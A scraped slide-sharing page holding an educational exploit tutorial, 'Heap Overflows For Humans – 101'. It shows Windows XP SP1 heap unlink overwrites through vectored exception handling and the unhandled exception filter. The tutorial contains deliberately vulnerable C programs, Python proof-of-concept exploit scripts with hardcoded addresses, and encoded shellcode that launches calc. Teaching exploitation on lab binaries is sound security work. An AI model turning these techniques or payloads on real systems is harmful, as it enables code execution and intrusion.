[CCC-28c3] Post Memory Corruption Memory Analysis
 
Virtual machine re building
Virtual machine re buildingVirtual machine re building
Virtual machine re building
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
 
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part IReturn Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part I
 
SFO15-500: VIXL
SFO15-500: VIXLSFO15-500: VIXL
SFO15-500: VIXL
 
Linux Shellcode disassembling
Linux Shellcode disassemblingLinux Shellcode disassembling
Linux Shellcode disassembling
 
EMBEDDED SYSTEMS 4&5
EMBEDDED SYSTEMS 4&5EMBEDDED SYSTEMS 4&5
EMBEDDED SYSTEMS 4&5
 
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege EscalationSemtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
 
Shellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse EngineeringShellcode Disassembling - Reverse Engineering
Shellcode Disassembling - Reverse Engineering
 
CarolinaCon 2009 Anti-Debugging
CarolinaCon 2009 Anti-DebuggingCarolinaCon 2009 Anti-Debugging
CarolinaCon 2009 Anti-Debugging
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
 
A Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source Code
A Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source CodeA Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source Code
A Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source Code
 

Recently uploaded

The Money Wave 2024 Review_ Is It the Key to Financial Success.pdf
The Money Wave 2024 Review_ Is It the Key to Financial Success.pdfThe Money Wave 2024 Review_ Is It the Key to Financial Success.pdf
The Money Wave 2024 Review_ Is It the Key to Financial Success.pdf
nirahealhty
 
Introduction To Disaster Recovery IT Services
Introduction To Disaster Recovery IT ServicesIntroduction To Disaster Recovery IT Services
Introduction To Disaster Recovery IT Services
Skywardit Solutions
 
Presentación1InteligenciaArtificial.pptx
Presentación1InteligenciaArtificial.pptxPresentación1InteligenciaArtificial.pptx
Presentación1InteligenciaArtificial.pptx
estudiomontesdeocape
 
How Can Microsoft Office 365 Improve Your Productivity?
How Can Microsoft Office 365 Improve Your Productivity?How Can Microsoft Office 365 Improve Your Productivity?
How Can Microsoft Office 365 Improve Your Productivity?
Digital Host
 
THE SOCIAL STEM- #1 TRUSTED DIGITAL MARKETING COMPANY
THE SOCIAL STEM- #1 TRUSTED DIGITAL MARKETING COMPANYTHE SOCIAL STEM- #1 TRUSTED DIGITAL MARKETING COMPANY
THE SOCIAL STEM- #1 TRUSTED DIGITAL MARKETING COMPANY
thesocialstem05
 
Nomad Internet: Leading Internet Provider for Rural Areas in the USA
Nomad Internet: Leading Internet Provider for Rural Areas in the USANomad Internet: Leading Internet Provider for Rural Areas in the USA
Nomad Internet: Leading Internet Provider for Rural Areas in the USA
Nomad Internet
 
Internet Celebrities and Purposeful Content Creation
Internet Celebrities and Purposeful Content CreationInternet Celebrities and Purposeful Content Creation
Internet Celebrities and Purposeful Content Creation
silnan
 
Pros and Cons of Investing in Stock Market ETFs.docx
Pros and Cons of Investing in Stock Market ETFs.docxPros and Cons of Investing in Stock Market ETFs.docx
Pros and Cons of Investing in Stock Market ETFs.docx
SFC Today
 
DataVinci-Google Analytics-Consulting-Services
DataVinci-Google Analytics-Consulting-ServicesDataVinci-Google Analytics-Consulting-Services
DataVinci-Google Analytics-Consulting-Services
Data Vinci
 
INSET Powerpoint Presentation Science Session 5.pptx.pdf
INSET Powerpoint Presentation Science Session 5.pptx.pdfINSET Powerpoint Presentation Science Session 5.pptx.pdf
INSET Powerpoint Presentation Science Session 5.pptx.pdf
MishaWilliams2
 
Introduction-to-Future-Technologies (2).pptx
Introduction-to-Future-Technologies (2).pptxIntroduction-to-Future-Technologies (2).pptx
Introduction-to-Future-Technologies (2).pptx
khushalsethi9
 
Epidemiology of viral hepatitis infection .pptx
Epidemiology of viral hepatitis infection .pptxEpidemiology of viral hepatitis infection .pptx
Epidemiology of viral hepatitis infection .pptx
ArunaDevi561806
 
ADEGUNADEGUNADEGUNADEGUNADEGUNADEGUNADEGUN.pdf
ADEGUNADEGUNADEGUNADEGUNADEGUNADEGUNADEGUN.pdfADEGUNADEGUNADEGUNADEGUNADEGUNADEGUNADEGUN.pdf
ADEGUNADEGUNADEGUNADEGUNADEGUNADEGUNADEGUN.pdf
ifraghaffar125
 
WTF is Food Journalism? An introduction to Food Media
WTF is Food Journalism? An introduction to Food MediaWTF is Food Journalism? An introduction to Food Media
WTF is Food Journalism? An introduction to Food Media
Damian Radcliffe
 
netflix-inspired intro for your latest presentation
netflix-inspired intro for your latest presentationnetflix-inspired intro for your latest presentation
netflix-inspired intro for your latest presentation
ArunRamkumar5
 
Network Security Firewall(Basics of Firewall)
Network Security Firewall(Basics of Firewall)Network Security Firewall(Basics of Firewall)
Network Security Firewall(Basics of Firewall)
sivaraman163206
 
Module 16 Incineration of Healthcare Waste and the Stockholm Convention Guide...
Module 16 Incineration of Healthcare Waste and the Stockholm Convention Guide...Module 16 Incineration of Healthcare Waste and the Stockholm Convention Guide...
Module 16 Incineration of Healthcare Waste and the Stockholm Convention Guide...
Beshoelwy
 
prestige-tranquil details of house and rooms
prestige-tranquil details of house and roomsprestige-tranquil details of house and rooms
prestige-tranquil details of house and rooms
Madhavi443720
 
Lublin triangle + Moldova 2024. research pdf
Lublin triangle + Moldova 2024. research pdfLublin triangle + Moldova 2024. research pdf
Lublin triangle + Moldova 2024. research pdf
ssuser54595a
 
PSP3 employability assessment form .docx
PSP3 employability assessment form .docxPSP3 employability assessment form .docx
PSP3 employability assessment form .docx
blessfkombo
 

Recently uploaded (20)

The Money Wave 2024 Review_ Is It the Key to Financial Success.pdf
The Money Wave 2024 Review_ Is It the Key to Financial Success.pdfThe Money Wave 2024 Review_ Is It the Key to Financial Success.pdf
The Money Wave 2024 Review_ Is It the Key to Financial Success.pdf
 
Introduction To Disaster Recovery IT Services
Introduction To Disaster Recovery IT ServicesIntroduction To Disaster Recovery IT Services
Introduction To Disaster Recovery IT Services
 
Presentación1InteligenciaArtificial.pptx
Presentación1InteligenciaArtificial.pptxPresentación1InteligenciaArtificial.pptx
Presentación1InteligenciaArtificial.pptx
 
How Can Microsoft Office 365 Improve Your Productivity?
How Can Microsoft Office 365 Improve Your Productivity?How Can Microsoft Office 365 Improve Your Productivity?
How Can Microsoft Office 365 Improve Your Productivity?
 
THE SOCIAL STEM- #1 TRUSTED DIGITAL MARKETING COMPANY
THE SOCIAL STEM- #1 TRUSTED DIGITAL MARKETING COMPANYTHE SOCIAL STEM- #1 TRUSTED DIGITAL MARKETING COMPANY
THE SOCIAL STEM- #1 TRUSTED DIGITAL MARKETING COMPANY
 
Nomad Internet: Leading Internet Provider for Rural Areas in the USA
Nomad Internet: Leading Internet Provider for Rural Areas in the USANomad Internet: Leading Internet Provider for Rural Areas in the USA
Nomad Internet: Leading Internet Provider for Rural Areas in the USA
 
Internet Celebrities and Purposeful Content Creation
Internet Celebrities and Purposeful Content CreationInternet Celebrities and Purposeful Content Creation
Internet Celebrities and Purposeful Content Creation
 
Pros and Cons of Investing in Stock Market ETFs.docx
Pros and Cons of Investing in Stock Market ETFs.docxPros and Cons of Investing in Stock Market ETFs.docx
Pros and Cons of Investing in Stock Market ETFs.docx
 
DataVinci-Google Analytics-Consulting-Services
DataVinci-Google Analytics-Consulting-ServicesDataVinci-Google Analytics-Consulting-Services
DataVinci-Google Analytics-Consulting-Services
 
INSET Powerpoint Presentation Science Session 5.pptx.pdf
INSET Powerpoint Presentation Science Session 5.pptx.pdfINSET Powerpoint Presentation Science Session 5.pptx.pdf
INSET Powerpoint Presentation Science Session 5.pptx.pdf
 
Introduction-to-Future-Technologies (2).pptx
Introduction-to-Future-Technologies (2).pptxIntroduction-to-Future-Technologies (2).pptx
Introduction-to-Future-Technologies (2).pptx
 
Epidemiology of viral hepatitis infection .pptx
Epidemiology of viral hepatitis infection .pptxEpidemiology of viral hepatitis infection .pptx
Epidemiology of viral hepatitis infection .pptx
 
ADEGUNADEGUNADEGUNADEGUNADEGUNADEGUNADEGUN.pdf
ADEGUNADEGUNADEGUNADEGUNADEGUNADEGUNADEGUN.pdfADEGUNADEGUNADEGUNADEGUNADEGUNADEGUNADEGUN.pdf
ADEGUNADEGUNADEGUNADEGUNADEGUNADEGUNADEGUN.pdf
 
WTF is Food Journalism? An introduction to Food Media
WTF is Food Journalism? An introduction to Food MediaWTF is Food Journalism? An introduction to Food Media
WTF is Food Journalism? An introduction to Food Media
 
netflix-inspired intro for your latest presentation
netflix-inspired intro for your latest presentationnetflix-inspired intro for your latest presentation
netflix-inspired intro for your latest presentation
 
Network Security Firewall(Basics of Firewall)
Network Security Firewall(Basics of Firewall)Network Security Firewall(Basics of Firewall)
Network Security Firewall(Basics of Firewall)
 
Module 16 Incineration of Healthcare Waste and the Stockholm Convention Guide...
Module 16 Incineration of Healthcare Waste and the Stockholm Convention Guide...Module 16 Incineration of Healthcare Waste and the Stockholm Convention Guide...
Module 16 Incineration of Healthcare Waste and the Stockholm Convention Guide...
 
prestige-tranquil details of house and rooms
prestige-tranquil details of house and roomsprestige-tranquil details of house and rooms
prestige-tranquil details of house and rooms
 
Lublin triangle + Moldova 2024. research pdf
Lublin triangle + Moldova 2024. research pdfLublin triangle + Moldova 2024. research pdf
Lublin triangle + Moldova 2024. research pdf
 
PSP3 employability assessment form .docx
PSP3 employability assessment form .docxPSP3 employability assessment form .docx
PSP3 employability assessment form .docx
 

Heap overflows for humans – 101

  • 1. 1 mr_me's IT security blog Exploiting, Reversing, Fuzzing, Code Analysis and Web Application Security Heap Overflows For Humans – 101 mr_me · Sunday, October 24th, 2010 We have talked previously about stack based buffer overflows and format strings vulnerabilities. Now it is time to take it a step further and play with the windows heap manager! Unlink() to execute a write 4 primitive Previously, with stack overflows, we have gained control of the execution pointer (EIP) some how whether that be through the exception handler or directly. Today we are going to discuss a series of techniques that have been tried and tested in time that gain control of execution without directly using EIP or SEH. By overwriting at a location in memory of our choice, with a controlled value, we are able to achieve an arbitary DWORD overwrite. If you are unfamilair with stack based buffer overflows to an intermediate/advanced level then it is suggested that you focus in this area first. What we are about to cover, has been dead and buried for a while, so if you are looking for newer techniques to exploit the windows heap manager, dont stick around What you will need: Windows XP with just sp1 installed.q A debugger (Olly Debugger, Immunity Debugger, windbg etc).q A c/c++ compilier (Dev C++, lcc-32, MS visual C++ 6.0 (if you can still get it)).q A scripting language of ease (I use python, maybe you can use perl).q A brain (and/or persistance).q Some knowledge of Assembly, C and knowledge on how to dig through a debuggerq HideDbg under Olly Debugger (plugin) or !hidedebug under immunity debuggerq Time.q We are going to focus on the core basics and fundementals. The techniques presented will most probably be too old to use in the “real world” however it must always be reminded that if you want to move forward, one must know the past. And learn from it. Ok lets begin! What is the heap and how does it work under XP? mr_me&#039;s IT security blog - 1 / 12 - 10.01.2011
  • 2. 2 The heap is a storage of area where a process can store data. Each process dynamically allocates and deallocates heap memory based on the requirements of the application and are globally accessible. It is important to point out that the stack grows towards 0×00000000 and yet the heap grows towards 0xFFFFFFFF. This means that if a process was to call HeapAllocate() twice, the second call would return a pointer that is higher than the first. Therefore any overflow of the first block will overflow into the second block. Every process whether its the default process heap or a dynamically allocated heap will contain multiple data structures. One of those data structures is an array of 128 LIST_ENTRY structures that keeps track of free blocks. This is known as the FreeLists. Each list entry holds two pointers and the beginning of this array can be found at offset 0×178 bytes into the heap structure. When a heap is created, two pointers which point to the first free block of memory available for allocation are set at FreeLists[0]. At the address that these two pointers point to (The beginning of the first available block) are two pointers that point to FreeLists[0]. Let that sink in, and then think about this. Assuming we have a heap with a base address of 0×00650000 and the first availble block is located at 0×00650688 then we can assume the following four addresses: At address 0×00650178 (Freelist[0].Flink) is a pointer with the value of 0×006506881. (Our first free block) A address 0x006517c (FreeList[0].Blink) is a pointer with the value of 0×00650688 (Our2. first free block) At address 0×00650688 (Our first free block) is a pointer with the value of 0×006501783. (FreeList[0]) At address 0x0065068c (Our first free block) is a pointer with the value of 0×006501784. (FreeList[0]) When an allocation occurs, the FreeList[0].Flink and FreeList[0].Blink pointers are updated to point to the next free block that will be allocated. Furthermore the two pointers that point back to the FreeList are moved to the end of the newly allocated block. Every allocation or free, these pointers are updated. Therefore, these allocations are tracked in a doubly linked list. When a heap buffer is overflowed into the heap control data, the updating of these pointers allows the arbitrary dword overwrite. An attacker at this point has the opportunity to modify program control data such as function pointers and thus gain control of the processes path of execution. Exploiting Heap Overflows using Vectored Exception Handling First, lets begin with our heap-veh.c code: mr_me&#039;s IT security blog - 2 / 12 - 10.01.2011
  • 3. 3 <br /> #include &lt;windows.h&gt;<br /> #include &lt;stdio.h&gt;</p> <p> DWORD MyExceptionHandler(void);<br /> int foo(char *buf);</p> <p> int main(int argc, char *argv[])<br /> {<br /> HMODULE l;<br /> l = LoadLibrary(&quot;msvcrt.dll&quot;);<br /> l = LoadLibrary(&quot;netapi32.dll&quot;);<br /> printf(&quot;nnHeapoverflow program.n&quot;);<br /> if(argc != 2)<br /> return printf(&quot;ARGS!&quot;);<br /> foo(argv[1]);<br /> return 0;<br /> }</p> <p> DWORD MyExceptionHandler(void)<br /> {<br /> printf(&quot;In exception handler....&quot;);<br /> ExitProcess(1);<br /> return 0;<br /> }</p> <p> int foo(char *buf)<br /> {<br /> HLOCAL h1 = 0, h2 = 0;<br /> HANDLE hp;</p> <p> __try{<br /> hp = HeapCreate(0,0x1000,0x10000);<br /> if(!hp){<br /> return printf(&quot;Failed to create heap.n&quot;);< br /> }<br /> h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);</p> <p> printf(&quot;HEAP: %.8X %.8Xn&quot;,h1,&amp;h1);</p> <p> // Heap Overflow occurs here:<br /> strcpy(h1,buf);</p> <p> // This second call to HeapAlloc() is when we gain con trol<br /> h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);<br /> printf(&quot;hello&quot;);<br /> }<br /> __except(MyExceptionHandler())<br /> {<br /> printf(&quot;oops...&quot;);<br /> }<br /> return 0;<br /> } mr_me&#039;s IT security blog - 3 / 12 - 10.01.2011
  • 4. 4 From the above code, we can see that their will be exception handling due to the __try block statement. Begin by compiling the code with your favourite ompiler under Windows XP SP1. Run the application on the command line, notice how it takes over 260 bytes as an argv and the exception handler kicks in. Now of course when we run this in the debugger, we gain control of the second allocation (because freelist[0] is being updated with our attack string from the first allocation). Look: MOV DWORD PTR DS:[ECX],EAX MOV DWORD PTR DS:[EAX+4],ECX These instructions are saying “Make the current value of EAX the pointer of ECX and make the current value of ECX the value of EAX at the next 4 bytes”. From this we know we are unlinking or freeing of the first allocated memory block. So essentially it means: EAX (what we write) : Blink1. ECX (location of where to write) : Flink2. So what is the vectored exception handling? vectored exception handling was introduced to windows XP when it was first released and stores exception registration structures on the heap. Unlike traditional frame exception handling such as SEH that stores its structure on the stack. This type of exception is called before any other frame based exception handling, The following struture dispicts the layout: struct _VECTORED_EXCEPTION_NODE<br /> {<br /> DWORD m_pNextNode;<br /> mr_me&#039;s IT security blog - 4 / 12 - 10.01.2011
  • 5. 5 DWORD m_pPreviousNode;<br /> PVOID m_pfnVectoredHandler;<br /> } All that you need to know is that the m_pNextNode points to the next _VECTORED_EXCEPTION_NODE structure therefore we must overwrite the pointer to _VECTORED_EXCEPTION_NODE (m_pNextNode) with our fake pointer. But what do we overwrite it with? lets take a look at the code that is responsible for dispatching the _VECTORED_EXCEPTION_NODE: 77F7F49E 8B35 1032FC77 MOV ESI,DWORD PTR DS:[77FC3210] 77F7F4A4 EB 0E JMP SHORT ntdll.77F7F4B4 77F7F4A6 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8] 77F7F4A9 50 PUSH EAX 77F7F4AA FF56 08 CALL DWORD PTR DS:[ESI+8] so we MOV the pointer of _VECTORED_EXCEPTION_NODE into ESI and then shortly after we call ESI + 8. If we set the next pointer of _VECTORED_EXCEPTION_NODE to our a pointer of our shellcode – 0×08, then we should land very neatly into our buffer. Where do we find a pointer to our shellcode? Well there is one on the stack :0) see: We can see our pointer to our shellcode on the stack. Ok no stress, lets use this hardcoded value 0x0012ff40. Except remember the call esi+8? well lets make sure we hit right on target for our shellcode so 0x0012ff40 – 0×08 = 0x0012ff38. Excellant so ECX is going to be set to 0x0012ff38. How do we find the m_NextNode (pointer to next _VECTORED_EXCEPTION_NODE)? Well in Olly (or immunity debugger) we can parse our exception so far using shift+f7 and try and continue the through the code. The code will setup for the call to the first _VECTORED_EXCEPTION_NODE and as such will reveal the pointer at: 77F60C2C BF 1032FC77 MOV EDI,ntdll.77FC3210 77F60C31 393D 1032FC77 CMP DWORD PTR DS:[77FC3210],EDI 77F60C37 0F85 48E80100 JNZ ntdll.77F7F485 You can see that the code is moving the m_pNextNode (our pointer that we need) into EDI. Excellant, lets set EAX to that value. mr_me&#039;s IT security blog - 5 / 12 - 10.01.2011
  • 6. 6 So as it stands, we have the following values set: ECX = 0x77fc3210 EAX = 0x0012ff38 But of course we need our offsets to EAX and ECX, so we just create an MSF pattern and feed it into the application. Here is a quick reminder for your viewing pleasure: Step 1 – Create msf pattern. Step 2 – Feed it to the target application Step 3 – Calculate offsets by turning on anti-debugging and triggering the exception Ok so here is a skeleton PoC exploit: <br /> import os<br /> # _vectored_exception_node<br /> mr_me&#039;s IT security blog - 6 / 12 - 10.01.2011
  • 7. 7 exploit = (&quot;xcc&quot; * 272)<br /> # ECX pointer to next _VECTORED_EXCEPTION_NODE = 0x77fc3210 - 0x04<br /> # due to second MOV writes to EAX+4 == 0x77fc320c<br /> exploit += (&quot;x0cx32xfcx77&quot;) # ECX<br /> # EAX ptr to shellcode located at 0012ff40 - 0x8 == 0012ff38<br /> exploit += (&quot;x38xffx12&quot;) # EAX - we dont need the null b yte<br /> os.system('&quot;C:Documents and SettingsSteveDesktopodbg110 OLLYDBG.EXE&quot; heap-veh.exe ' + exploit)<br /> Now at this stage we cannot have shellcode after our ECX instruction because it contains a null byte, you may remember this from my previous tutorial Debugging an SEH 0day. This may not always be the case as in this example we are using a strcpy to store our buffer in the heap. Ok so at this point we hit out software breakpoints at “xcc” and can simply replace this with some shellcode. The shellcode must not be more than 272 bytes as this is the only spot to place our shellcode. <br /> # _vectored_exception_node<br /> import os<br /> import win32api<br /> calc = (&quot;xdaxcbx2bxc9xd9x74x24xf4x58xb1x32xbbxfaxc d&quot; +<br /> &quot;x2dx4ax83xe8xfcx31x58x14x03x58xeex2fxd8xb6&quot; +<br /> &quot;xe6x39x23x47xf6x59xadxa2xc7x4bxc9xa7x75x5c&quot; +<br /> &quot;x99xeax75x17xcfx1ex0ex55xd8x11xa7xd0x3ex1f&quot; +<br /> &quot;x38xd5xfexf3xfax77x83x09x2ex58xbaxc1x23x99&quot; +<br /> &quot;xfbx3cxcbxcbx54x4ax79xfcxd1x0ex41xfdx35x05&quot; +<br /> &quot;xf9x85x30xdax8dx3fx3ax0bx3dx4bx74xb3x36x13&quot; +<br /> &quot;xa5xc2x9bx47x99x8dx90xbcx69x0cx70x8dx92x3e&quot; +<br /> &quot;xbcx42xadx8ex31x9axe9x29xa9xe9x01x4ax54xea&quot; +<br /> &quot;xd1x30x82x7fxc4x93x41x27x2cx25x86xbexa7x29&quot; +<br /> &quot;x63xb4xe0x2dx72x19x9bx4axffx9cx4cxdbxbbxba&quot; +<br /> &quot;x48x87x18xa2xc9x6dxcfxdbx0axc9xb0x79x40xf8&quot; +<br /> mr_me&#039;s IT security blog - 7 / 12 - 10.01.2011
  • 8. 8 &quot;xa5xf8x0bx97x38x88x31xdex3ax92x39x71x52xa3&quot; +<br /> &quot;xb2x1ex25x3cx11x5bxd9x76x38xcax71xdfxa8x4e&quot; +<br /> &quot;x1cxe0x06x8cx18x63xa3x6dxdfx7bxc6x68xa4x3b&quot; +<br /> &quot;x3ax01xb5xa9x3cxb6xb6xfbx5ex59x24x67xa1x93&quot;) </p> <p>exploit = (&quot;x90&quot; * 5)<br /> exploit += (calc)<br /> exploit += (&quot;xcc&quot; * (272-len(exploit)))<br /> # ECX pointer to next _VECTORED_EXCEPTION_NODE = 0x77fc3210 - 0x04<br /> # due to second MOV writes to EAX+4 == 0x77fc320c<br /> exploit += (&quot;x0cx32xfcx77&quot;) # ECX<br /> # EAX ptr to shellcode located at 0012ff40 - 0x8 == 0012ff38<br /> exploit += (&quot;x38xffx12&quot;) # EAX - we dont need the null b yte<br /> win32api.WinExec(('heap-veh.exe %s') % exploit, 1)<br /> Exploiting Heap Overflows using the Unhandled Exception Filter The Unhandler Exception Filter is the last exception to be called before an application closes. It is responsible for dispatching of the very common message “An unhandled error occured” when an application suddenly crashes. Up until this point, we have gotten to the stage of controlling EAX and ECX and knowing the offset location to both registers: <br /> import os<br /> exploit = (&quot;xcc&quot; * 272)<br /> exploit += (&quot;x41&quot; * 4) # ECX<br /> exploit += (&quot;x42&quot; * 4) # EAX<br /> exploit += (&quot;xcc&quot; * 272)<br /> os.system('&quot;C:Documents and SettingsSteveDesktopodbg110 OLLYDBG.EXE&quot; heap-uef.exe ' + exploit)<br /> Unlike the previous example, our heap-uef.c file contains no traces of a custom exception handler defined. This means we are going to exploit the application using Microsofts default Unhandled Exception Filter. Below is the heap-uef.c file: <br /> #include &lt;stdio.h&gt;<br /> #include &lt;windows.h&gt;</p> <p> int foo(char *buf);<br /> int main(int argc, char *argv[])<br /> {<br /> mr_me&#039;s IT security blog - 8 / 12 - 10.01.2011
  • 9. 9 HMODULE l;<br /> l = LoadLibrary(&quot;msvcrt.dll&quot;);<br /> l = LoadLibrary(&quot;netapi32.dll&quot;);<br /> printf(&quot;nnHeapoverflow program.n&quot;);<br /> if(argc != 2)<br /> return printf(&quot;ARGS!&quot;);<br /> foo(argv[1]);<br /> return 0;<br /> }</p> <p> int foo(char *buf)<br /> {<br /> HLOCAL h1 = 0, h2 = 0;<br /> HANDLE hp;</p> <p> hp = HeapCreate(0,0x1000,0x10000);<br /> if(!hp)<br /> return printf(&quot;Failed to create heap.n&quot;);<br / > h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);<br /> printf(&quot;HEAP: %.8X %.8Xn&quot;,h1,&amp;h1);</p> <p> // Heap Overflow occurs here:<br /> strcpy(h1,buf);</p> <p> // We gain control of this second call to HeapAlloc<br /> h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);<br /> printf(&quot;hello&quot;);<br /> return 0;<br /> }<br /> When debugging this type of overflow, its important to turn anti debugging on within Olly or Immunity Debugger so that our Exception Filter is called and offsets are at the correct location. Ok so first of all, we must find where we are going to write our dword too. This would be the pointer to Unhandled Exception Filter. This can be found by going looking at the code at SetUnhandledExceptionFilter(). It can be see that a MOV instruction uses a pointer to UnhandledExceptionFilter (0x77ed73b4): mr_me&#039;s IT security blog - 9 / 12 - 10.01.2011
  • 10. 10 So at this point, we can saftley say that ECX will contain the value 0x77c3bbad. But now what are we going to write? lets take a look at what happens when the UnhandledExceptionFilter is called: 77E93114 A1 B473ED77 MOV EAX,DWORD PTR DS:[77ED73B4] 77E93119 3BC6 CMP EAX,ESI 77E9311B 74 15 JE SHORT kernel32.77E93132 77E9311D 57 PUSH EDI 77E9311E FFD0 CALL EAX Basically, the pointer to UnhandledExceptionFilter() is parsed into EAX and a push EDI, then call EAX executes. Similar to Vectored Exception Handling (except the complete opposite ), we can overwrite the pointers value. This pointer will then point to our shellcode, or an instruction that will get us back to our shellcode. If we take a look at EDI, we will notice a pointer after 0×78 bytes to the bottom of our payload (8 bytes off the bottom of our payload). So if we simply call this pointer, we will be executing our shellcode. Therefore we need an instruction in EAX such as: call dword ptr ds:[edi+74] This instruction is easily found in many MS modules under XP sp1. So then lets fill in these values into our PoC and see where we land: <br /> import os<br /> mr_me&#039;s IT security blog - 10 / 12 - 10.01.2011
  • 11. 11 exploit = (&quot;xcc&quot; * 272)<br /> exploit += (&quot;xadxbbxc3x77&quot;) # ECX 0x77C3BBAD --&gt; cal l dword ptr ds:[EDI+74]<br /> exploit += (&quot;xb4x73xedx77&quot;) # EAX 0x77ED73B4 --&gt; Unh andledExceptionFilter()<br /> exploit += (&quot;xcc&quot; * 272)<br /> os.system('&quot;C:Documents and SettingsSteveDesktopodbg110 OLLYDBG.EXE&quot; heap-uef.exe ' + exploit)<br /> Of course we simply calculate the offset to this part of the shellcode and insert our JMP instruction code and insert our shellcode: <br /> import os</p> <p>calc = (&quot;x33xC0x50x68x63x61x6Cx63x54x5Bx50x53xB9 &quot;<br /> &quot;x44x80xc2x77&quot; # address to WinExec()<br /> &quot;xFFxD1x90x90&quot;)</p> <p>exploit = (&quot;x44&quot; * 264)<br /> exploit += &quot;xebx14&quot; # our JMP (over the junk and into nop s)<br /> exploit += (&quot;x44&quot; * 6)<br /> exploit += (&quot;xadxbbxc3x77&quot;) # ECX 0x77C3BBAD --&gt; cal l dword ptr ds:[EDI+74]<br /> exploit += (&quot;xb4x73xedx77&quot;) # EAX 0x77ED73B4 --&gt; Unh andledExceptionFilter()<br /> exploit += (&quot;x90&quot; * 21)<br /> exploit += calc</p> <p>os.system('heap-uef.exe ' + exploit)<br /> Boom ! mr_me&#039;s IT security blog - 11 / 12 - 10.01.2011
  • 12. 12 Conclusion: We have demonstrated two techniques for exploiting unlink() in its most primitive form under windows XP sp1. Other techniques can also apply such as RtlEnterCriticalSection or TEB Exception Handler exploitation in the same situation. Following on from here we will present exploiting Unlink() (HeapAlloc/HeapFree) under Windows XP sp2 and 3 and bypass windows protections against the heap. PoC’s: http://www.exploit-db.com/exploits/12240/q http://www.exploit-db.com/exploits/15957/q References: The shellcoder’s handbook (Chris Anley, John Heasman, FX, Gerardo Richarte)1. David Litchfield2. (http://www.blackhat.com/presentations/win-usa-04/bh-win-04-litchfield/bh-win-04-litchf ield.ppt) This entry was posted on Sunday, October 24th, 2010 at 2:30 pm and is filed under exploit development You can follow any responses to this entry through the Comments (RSS) feed. You can leave a response, or trackback from your own site. mr_me&#039;s IT security blog - 12 / 12 - 10.01.2011